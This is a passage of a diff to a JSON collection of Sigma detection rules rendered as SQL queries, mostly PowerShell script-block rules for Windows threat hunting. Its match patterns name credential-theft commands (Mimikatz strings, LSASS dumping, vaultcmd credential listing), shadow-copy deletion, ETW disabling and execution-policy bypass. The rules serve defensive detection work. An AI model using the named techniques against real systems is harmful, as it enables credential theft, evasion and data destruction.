ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" ], - "filename": "win_appxpackaging_om_sups_appx_signature.yml" + "filename": "posh_ps_root_certificate_installed.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Change PowerShell Policies to an Insecure Level - PowerShell", + "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "status": "experimental", + "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Administrator script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_set_policies_to_unsecure_level.yml" }, { - "title": "Suspicious Application Installed", - "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", - "status": "experimental", - "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Execute Invoke-command on Remote Host", + "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", + "status": "test", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Packages or applications being legitimately used by users or administrators" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" ], - "filename": "win_shell_core_susp_packages_installed.yml" + "filename": "posh_ps_invoke_command_remote.yml" }, { - "title": "Suspicious Rejected SMB Guest Logon From IP", - "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", "status": "test", - "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", - "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1110.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Account fallback reasons (after failed login with specific account)" + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + ], + "filename": "posh_ps_susp_win32_shadowcopy.yml" + }, + { + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", + "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", + "status": "experimental", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "win_susp_failed_guest_logon.yml" + "filename": "posh_ps_invoke_obfuscation_via_compress.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", - "author": "frack113", + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.credential_access", - "attack.privilege_escalation" + "attack.t1556.002" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_etw_trace_evasion.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "title": "Winlogon Helper DLL", + "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_winlogon_helper_dll.yml" }, { - "title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Registry Permissions Weakness Check", + "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_get_acl_service.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "title": "Potential Invoke-Mimikatz PowerShell Script", + "id": "189e3b02-82b2-4b90-9662-411eb64486d4", "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", + "author": "Tim Rauch", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Mimikatz can be useful for testing the security of networks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_potential_invoke_mimikatz.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", - "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "title": "Live Memory Dump Using Powershell", + "id": "cd185561-4760-45d6-a63e-a51325112cae", + "status": "test", + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Diagnostics" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Hyper-V Cmdlets", + "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "status": "experimental", + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1564.006" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_susp_hyper_v_condlet.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", - "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "test", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055" + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", + "id": "603c6630-5225-49c1-8047-26c964553e0e", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.003", - "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%cmlua.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", + "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", + "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.exfiltration" ], "falsepositives": [ - "Likely" + "Legitimate usage of the cmdlet to forward emails" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT 